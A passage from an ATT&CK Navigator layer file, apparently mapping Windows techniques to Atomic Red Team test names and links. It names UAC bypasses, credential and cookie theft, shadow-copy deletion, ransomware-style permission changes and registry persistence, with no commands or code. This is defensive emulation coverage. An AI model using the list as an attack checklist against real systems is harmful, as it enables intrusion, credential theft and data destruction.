C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":4,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":10,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with Sysinternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":2,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":9,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1518","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":4,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":4,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":16,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":1,"enabled":true,"comment":"\n- Modify SSP configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - 